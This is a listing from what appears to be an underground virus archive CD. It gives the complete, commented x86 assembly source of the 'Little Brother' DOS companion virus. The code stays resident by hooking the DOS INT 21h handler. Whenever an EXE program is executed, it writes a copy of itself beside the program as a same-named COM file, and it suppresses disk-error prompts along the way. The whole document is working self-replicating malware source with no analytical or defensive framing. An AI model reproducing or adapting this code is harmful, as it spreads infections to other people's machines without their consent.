home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / b / brother.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  7.8 KB  |  242 lines
  1. ;****************************************************************************
  2. ;*              Little Brother  Version 1
  3. ;****************************************************************************
  4.  
  5. cseg            segment
  6.                 assume  cs:cseg,ds:cseg,es:nothing
  7.  
  8.                 org     100h
  9.  
  10. FILELEN         equ     end - begin
  11. RESPAR          equ     (FILELEN/16) + 17
  12. VERSION         equ     1
  13. oi21            equ     end
  14. nameptr         equ     end+4
  15. DTA             equ     end+8
  16.  
  17.                 .RADIX  16
  18.  
  19.  
  20. ;****************************************************************************
  21. ;*              Start the program!
  22. ;****************************************************************************
  23.  
  24. begin:          cld
  25.  
  26.                 mov     ax,0DEDEh               ;already installed?
  27.                 int     21h
  28.                 cmp     ah,041h
  29.                 je      cancel
  30.  
  31.                 mov     ax,0044h                ;move program to empty hole
  32.                 mov     es,ax
  33.                 mov     di,0100h
  34.                 mov     si,di
  35.                 mov     cx,FILELEN
  36.         rep     movsb
  37.  
  38.                 mov     ds,cx                   ;get original int21 vector
  39.                 mov     si,0084h
  40.                 mov     di,offset oi21
  41.                 movsw
  42.                 movsw
  43.  
  44.                 push    es                      ;set vector to new handler
  45.                 pop     ds
  46.                 mov     dx,offset ni21
  47.                 mov     ax,2521h
  48.                 int     21h
  49.  
  50. cancel:         ret
  51.  
  52.  
  53. ;****************************************************************************
  54. ;*              File-extensions
  55. ;****************************************************************************
  56.  
  57. EXE_txt         db      'EXE',0
  58. COM_txt         db      'COM',0
  59.  
  60.  
  61. ;****************************************************************************
  62. ;*              Interupt handler 24
  63. ;****************************************************************************
  64.  
  65. ni24:           mov     al,03
  66.                 iret
  67.  
  68.  
  69. ;****************************************************************************
  70. ;*              Interupt handler 21
  71. ;****************************************************************************
  72.  
  73. ni21:           pushf
  74.  
  75.                 cmp     ax,0DEDEh               ;install-check ?
  76.                 je      do_DEDE
  77.  
  78.                 push    dx
  79.                 push    bx
  80.                 push    ax
  81.                 push    ds
  82.                 push    es
  83.  
  84.                 cmp     ax,4B00h                ;execute ?
  85.                 jne     exit
  86.  
  87. doit:           call    infect
  88.  
  89. exit:           pop     es
  90.                 pop     ds
  91.                 pop     ax
  92.                 pop     bx
  93.                 pop     dx
  94.                 popf
  95.  
  96.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  97.  
  98. do_DEDE:        mov     ax,04100h+VERSION       ;return a signature
  99.                 popf
  100.                 iret
  101.  
  102.  
  103. ;****************************************************************************
  104. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  105. ;****************************************************************************
  106.  
  107. infect:         cld
  108.  
  109.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  110.                 mov     word ptr cs:[nameptr+2],ds
  111.  
  112.                 push    cs                      ;set new DTA
  113.                 pop     ds
  114.                 mov     dx,offset DTA
  115.                 mov     ah,1Ah
  116.                 int     21
  117.  
  118.                 call    searchpoint
  119.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  120.                 mov     cx,3
  121.         rep     cmpsb
  122.                 jnz     do_com
  123.  
  124. do_exe:         mov     si,offset COM_txt       ;change extension to COM
  125.                 call    change_ext
  126.  
  127.                 mov     ax,3300h                ;get ctrl-break flag
  128.                 int     21
  129.                 push    dx
  130.  
  131.                 xor     dl,dl                   ;clear the flag
  132.                 mov     ax,3301h
  133.                 int     21
  134.  
  135.                 mov     ax,3524h                ;get int24 vector
  136.                 int     21
  137.                 push    bx
  138.                 push    es
  139.  
  140.                 push    cs                      ;set int24 vec to new handler
  141.                 pop     ds
  142.                 mov     dx,offset ni24
  143.                 mov     ax,2524h
  144.                 int     21
  145.  
  146.                 lds     dx,dword ptr [nameptr]  ;create the file (unique name)
  147.                 xor     cx,cx
  148.                 mov     ah,5Bh
  149.                 int     21
  150.                 jc      return1                 
  151.                 xchg    bx,ax                   ;save handle
  152.  
  153.                 push    cs
  154.                 pop     ds
  155.                 mov     cx,FILELEN              ;write the file
  156.                 mov     dx,offset begin
  157.                 mov     ah,40h
  158.                 int     21
  159.                 cmp     ax,cx
  160.                 pushf
  161.  
  162.                 mov     ah,3Eh                  ;close the file
  163.                 int     21
  164.  
  165.                 popf
  166.                 jz      return1                 ;all bytes written?
  167.  
  168.                 lds     dx,dword ptr [nameptr]  ;delete the file
  169.                 mov     ah,41h
  170.                 int     21
  171.  
  172. return1:        pop     ds                      ;restore int24 vector
  173.                 pop     dx
  174.                 mov     ax,2524h
  175.                 int     21
  176.  
  177.                 pop     dx                      ;restore ctrl-break flag
  178.                 mov     ax,3301h
  179.                 int     21
  180.  
  181.                 mov     si,offset EXE_txt       ;change extension to EXE
  182.                 call    change_ext
  183.  
  184. return:         ret
  185.  
  186. do_com:         call    findfirst               ;is the file a virus?
  187.                 cmp     word ptr cs:[DTA+1Ah],FILELEN
  188.                 jne     return
  189.                 mov     si,offset EXE_txt       ;does the EXE-variant exist?
  190.                 call    change_ext
  191.                 call    findfirst
  192.                 jnc     return
  193.                 mov     si,offset COM_txt       ;change extension to COM
  194.                 jmp     short change_ext
  195.  
  196.  
  197. ;****************************************************************************
  198. ;*              Find the file
  199. ;****************************************************************************
  200.  
  201. findfirst:      lds     dx,dword ptr [nameptr]
  202.                 mov     cl,27h
  203.                 mov     ah,4Eh
  204.                 int     21
  205.                 ret                
  206.  
  207.  
  208. ;****************************************************************************
  209. ;*              change the extension of the filename (CS:SI -> ext)
  210. ;****************************************************************************
  211.  
  212. change_ext:     call    searchpoint
  213.                 push    cs
  214.                 pop     ds
  215.                 movsw
  216.                 movsw
  217.                 ret
  218.  
  219.  
  220. ;****************************************************************************
  221. ;*              search begin of extension  
  222. ;****************************************************************************
  223.  
  224. searchpoint:    les     di,dword ptr cs:[nameptr]
  225.                 mov     ch,0FFh
  226.                 mov     al,'.'
  227.         repnz   scasb
  228.                 ret
  229.  
  230.  
  231. ;****************************************************************************
  232. ;*              Text and Signature
  233. ;****************************************************************************
  234.  
  235.                 db      'Little Brother',0
  236.  
  237. end:
  238.  
  239. cseg            ends
  240.                 end     begin
  241.  
  242.